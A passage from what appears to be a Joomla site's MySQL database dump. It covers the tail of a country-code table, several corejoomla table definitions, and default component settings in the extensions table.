(163, 'MP', 'Northern Mariana Islands', '*'),
(164, 'NO', 'Norway', '*'),
(165, 'OM', 'Oman', '*'),
(166, 'PK', 'Pakistan', '*'),
(167, 'PW', 'Palau', '*'),
(168, 'PS', 'Palestinian Territory', '*'),
(169, 'PA', 'Panama', '*'),
(170, 'PG', 'Papua New Guinea', '*'),
(171, 'PY', 'Paraguay', '*'),
(172, 'PE', 'Peru', '*'),
(173, 'PH', 'Philippines', '*'),
(174, 'PN', 'Pitcairn', '*'),
(175, 'PL', 'Poland', '*'),
(176, 'PT', 'Portugal', '*'),
(177, 'PR', 'Puerto Rico', '*'),
(178, 'QA', 'Qatar', '*'),
(179, 'RE', 'Réunion', '*'),
(180, 'RO', 'Romania', '*'),
(181, 'RU', 'Russian Federation', '*'),
(182, 'RW', 'Rwanda', '*'),
(183, 'BL', 'Saint Barth�lemy', '*'),
(184, 'SH', 'Saint Helena', '*'),
(185, 'KN', 'Saint Kitts And Nevis', '*'),
(186, 'LC', 'Saint Lucia', '*'),
(187, 'MF', 'Saint Martin', '*'),
(188, 'PM', 'Saint Pierre And Miquelon', '*'),
(189, 'VC', 'Saint Vincent And The Grenadines', '*'),
(190, 'WS', 'Samoa', '*'),
(191, 'SM', 'San Marino', '*'),
(192, 'ST', 'Sao Tome And Principe', '*'),
(193, 'SA', 'Saudi Arabia', '*'),
(194, 'SN', 'Senegal', '*'),
(195, 'RS', 'Serbia', '*'),
(196, 'SC', 'Seychelles', '*'),
(197, 'SL', 'Sierra Leone', '*'),
(198, 'SG', 'Singapore', '*'),
(199, 'SK', 'Slovakia', '*'),
(200, 'SI', 'Slovenia', '*'),
(201, 'SB', 'Solomon Islands', '*'),
(202, 'SO', 'Somalia', '*'),
(203, 'ZA', 'South Africa', '*'),
(204, 'GS', 'South Georgia And The South Sandwich Islands', '*'),
(205, 'ES', 'Spain', '*'),
(206, 'LK', 'Sri Lanka', '*'),
(207, 'SD', 'Sudan', '*'),
(208, 'SR', 'Suriname', '*'),
(209, 'SJ', 'Svalbard And Jan Mayen', '*'),
(210, 'SZ', 'Swaziland', '*'),
(211, 'SE', 'Sweden', '*'),
(212, 'CH', 'Switzerland', '*'),
(213, 'SY', 'Syrian Arab Republic', '*'),
(214, 'TW', 'Taiwan', '*'),
(215, 'TJ', 'Tajikistan', '*'),
(216, 'TZ', 'Tanzania', '*'),
(217, 'TH', 'Thailand', '*'),
(218, 'TL', 'Timor-Leste', '*'),
(219, 'TG', 'Togo', '*'),
(220, 'TK', 'Tokelau', '*'),
(221, 'TO', 'Tonga', '*'),
(222, 'TT', 'Trinidad And Tobago', '*'),
(223, 'TN', 'Tunisia', '*'),
(224, 'TR', 'Turkey', '*'),
(225, 'TM', 'Turkmenistan', '*'),
(226, 'TC', 'Turks And Caicos Islands', '*'),
(227, 'TV', 'Tuvalu', '*'),
(228, 'UG', 'Uganda', '*'),
(229, 'UA', 'Ukraine', '*'),
(230, 'AE', 'United Arab Emirates', '*'),
(231, 'GB', 'United Kingdom', '*'),
(232, 'US', 'United States', '*'),
(233, 'UM', 'United States Minor Outlying Islands', '*'),
(234, 'UY', 'Uruguay', '*'),
(235, 'UZ', 'Uzbekistan', '*'),
(236, 'VU', 'Vanuatu', '*'),
(237, 'VA', 'Vatican City State', '*'),
(238, 'VE', 'Venezuela', '*'),
(239, 'VN', 'Viet Nam', '*'),
(240, 'VG', 'Virgin Islands British', '*'),
(241, 'VI', 'Virgin Islands U.S.', '*'),
(242, 'WF', 'Wallis And Futuna', '*'),
(243, 'EH', 'Western Sahara', '*'),
(244, 'YE', 'Yemen', '*'),
(245, 'ZM', 'Zambia', '*'),
(246, 'ZW', 'Zimbabwe', '*'),
(247, 'EU', 'European Union', '*'),
(248, 'UK', 'United Kingdom', '*'),
(249, 'AC', 'Ascension Island', '*'),
(250, 'CP', 'Clipperton Island', '*'),
(251, 'DG', 'Diego Garcia', '*'),
(252, 'EA', 'Ceuta, Melilla', '*'),
(253, 'FX', 'France, Metropolitan', '*'),
(254, 'IC', 'Canary Islands', '*'),
(255, 'SU', 'USSR', '*'),
(256, 'TA', 'Tristan da Cunha', '*'),
(257, 'XX', 'Unknown', '*');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_corejoomla_messagequeue`
--

CREATE TABLE `y57u5_corejoomla_messagequeue` (
  `id` int(10) UNSIGNED NOT NULL,
  `status` tinyint(4) UNSIGNED NOT NULL DEFAULT '0',
  `to_addr` varchar(128) NOT NULL,
  `cc_addr` varchar(128) DEFAULT NULL,
  `bcc_addr` varchar(128) DEFAULT NULL,
  `html` tinyint(1) NOT NULL DEFAULT '1',
  `message_id` int(10) UNSIGNED NOT NULL,
  `params` mediumtext,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `processed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_corejoomla_messages`
--

CREATE TABLE `y57u5_corejoomla_messages` (
  `id` int(10) UNSIGNED NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL,
  `asset_name` varchar(64) NOT NULL,
  `subject` varchar(255) NOT NULL,
  `description` mediumtext NOT NULL,
  `params` varchar(999) DEFAULT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_corejoomla_rating`
--

CREATE TABLE `y57u5_corejoomla_rating` (
  `item_id` int(10) UNSIGNED NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL,
  `total_ratings` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `sum_rating` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `rating` decimal(4,2) NOT NULL DEFAULT '0.00'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_corejoomla_rating_details`
--

CREATE TABLE `y57u5_corejoomla_rating_details` (
  `id` int(10) UNSIGNED NOT NULL,
  `asset_id` int(10) UNSIGNED NOT NULL,
  `item_id` int(10) UNSIGNED NOT NULL,
  `action_id` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `rating` int(10) UNSIGNED NOT NULL,
  `created_by` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_core_log_searches`
--

CREATE TABLE `y57u5_core_log_searches` (
  `search_term` varchar(128) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `hits` int(10) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_extensions`
--

CREATE TABLE `y57u5_extensions` (
  `extension_id` int(11) NOT NULL,
  `package_id` int(11) NOT NULL DEFAULT '0' COMMENT 'Parent package ID for extensions installed as a package.',
  `name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL,
  `element` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `folder` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` tinyint(3) NOT NULL,
  `enabled` tinyint(3) NOT NULL DEFAULT '0',
  `access` int(10) UNSIGNED DEFAULT NULL,
  `protected` tinyint(3) NOT NULL DEFAULT '0',
  `manifest_cache` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `custom_data` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `system_data` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `checked_out` int(10) UNSIGNED NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) DEFAULT '0',
  `state` int(11) DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `y57u5_extensions`
--

INSERT INTO `y57u5_extensions` (`extension_id`, `package_id`, `name`, `type`, `element`, `folder`, `client_id`, `enabled`, `access`, `protected`, `manifest_cache`, `params`, `custom_data`, `system_data`, `checked_out`, `checked_out_time`, `ordering`, `state`) VALUES
(1, 0, 'com_mailto', 'component', 'com_mailto', '', 0, 1, 1, 1, '{\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mailto\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(2, 0, 'com_wrapper', 'component', 'com_wrapper', '', 0, 1, 1, 1, '{\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"wrapper\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(3, 0, 'com_admin', 'component', 'com_admin', '', 1, 1, 1, 1, '{\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(4, 0, 'com_banners', 'component', 'com_banners', '', 1, 1, 1, 0, '{\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"banners\"}', '{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(5, 0, 'com_cache', 'component', 'com_cache', '', 1, 1, 1, 1, '{\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(6, 0, 'com_categories', 'component', 'com_categories', '', 1, 1, 1, 1, '{\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(7, 0, 'com_checkin', 'component', 'com_checkin', '', 1, 1, 1, 1, '{\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(8, 0, 'com_contact', 'component', 'com_contact', '', 1, 1, 1, 0, '{\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}', '{\"contact_layout\":\"_:default\",\"show_contact_category\":\"hide\",\"show_contact_list\":\"0\",\"presentation_style\":\"sliders\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_misc\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"category_layout\":\"_:default\",\"show_category_title\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"0\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"0\",\"show_subcat_desc\":\"1\",\"show_cat_items\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_items_cat\":\"1\",\"show_pagination_limit\":\"1\",\"show_headings\":\"1\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"initial_sort\":\"ordering\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_feed_link\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(9, 0, 'com_cpanel', 'component', 'com_cpanel', '', 1, 1, 1, 1, '{\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(10, 0, 'com_installer', 'component', 'com_installer', '', 1, 1, 1, 1, '{\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(11, 0, 'com_languages', 'component', 'com_languages', '', 1, 1, 1, 1, '{\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}', '{\"administrator\":\"en-GB\",\"site\":\"en-GB\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(12, 0, 'com_login', 'component', 'com_login', '', 1, 1, 1, 1, '{\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(13, 0, 'com_media', 'component', 'com_media', '', 1, 1, 0, 1, '{\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}', '{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(14, 0, 'com_menus', 'component', 'com_menus', '', 1, 1, 1, 1, '{\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(15, 0, 'com_messages', 'component', 'com_messages', '', 1, 1, 1, 1, '{\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}', '', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(16, 0, 'com_modules', 'component', 'com_modules', '', 1, 1, 1, 1, '{\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(17, 0, 'com_newsfeeds', 'component', 'com_newsfeeds', '', 1, 1, 1, 0, '{\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}', '{\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_word_count\":\"0\",\"show_headings\":\"1\",\"show_name\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"display_num\":\"\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\",\"show_cat_items\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(18, 0, 'com_plugins', 'component', 'com_plugins', '', 1, 1, 1, 1, '{\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(19, 0, 'com_search', 'component', 'com_search', '', 1, 1, 1, 0, '{\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"search\"}', '{\"enabled\":\"0\",\"show_date\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(20, 0, 'com_templates', 'component', 'com_templates', '', 1, 1, 1, 1, '{\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}', '{\"template_positions_display\":\"0\",\"upload_limit\":\"2\",\"image_formats\":\"gif,bmp,jpg,jpeg,png\",\"source_formats\":\"txt,less,ini,xml,js,php,css\",\"font_formats\":\"woff,ttf,otf\",\"compressed_formats\":\"zip\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(22, 0, 'com_content', 'component', 'com_content', '', 1, 1, 0, 1, '{\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}', '{\"article_layout\":\"_:default\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"info_block_position\":\"0\",\"info_block_show_title\":\"1\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_associations\":\"0\",\"flags\":\"1\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"1\",\"show_vote\":\"0\",\"show_readmore\":\"1\",\"show_readmore_title\":\"1\",\"readmore_limit\":\"100\",\"show_tags\":\"1\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"record_hits\":\"1\",\"show_noauth\":\"0\",\"urls_position\":\"0\",\"captcha\":\"\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"save_history\":\"0\",\"history_limit\":10,\"show_urls_images_frontend\":\"1\",\"show_urls_images_backend\":\"1\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"right\",\"float_fulltext\":\"right\",\"category_layout\":\"_:blog\",\"show_category_heading_title_text\":\"1\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"1\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"0\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"0\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"list_show_votes\":\"0\",\"list_show_ratings\":\"0\",\"orderby_pri\":\"order\",\"orderby_sec\":\"rdate\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_featured\":\"show\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"feed_show_readmore\":\"0\",\"sef_advanced\":0,\"sef_ids\":0,\"custom_fields_enable\":\"1\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(23, 0, 'com_config', 'component', 'com_config', '', 1, 1, 0, 1, '{\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}', '{\"filters\":{\"1\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"9\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(24, 0, 'com_redirect', 'component', 'com_redirect', '', 1, 1, 0, 1, '{\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}', '{}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(25, 0, 'com_users', 'component', 'com_users', '', 1, 1, 0, 1, '{\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"users\"}', '{\"allowUserRegistration\":\"0\",\"new_usertype\":\"2\",\"guest_usergroup\":\"1\",\"sendpassword\":\"1\",\"useractivation\":\"1\",\"mail_to_admin\":\"1\",\"captcha\":\"\",\"frontend_userparams\":\"1\",\"site_language\":\"0\",\"change_login_name\":\"0\",\"reset_count\":\"10\",\"reset_time\":\"1\",\"minimum_length\":\"4\",\"minimum_integers\":\"0\",\"minimum_symbols\":\"0\",\"minimum_uppercase\":\"0\",\"save_history\":\"0\",\"history_limit\":5,\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
(27, 0, 'com_finder', 'component', 'com_finder', '', 1, 1, 0, 0, '{\"name\":\"com_finder\",\"type\":\"component\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2019 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}', '{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stemmer\":\"porter_en\"}', '', '', 0, '0000-00-00 00:00:00', 0, 0),
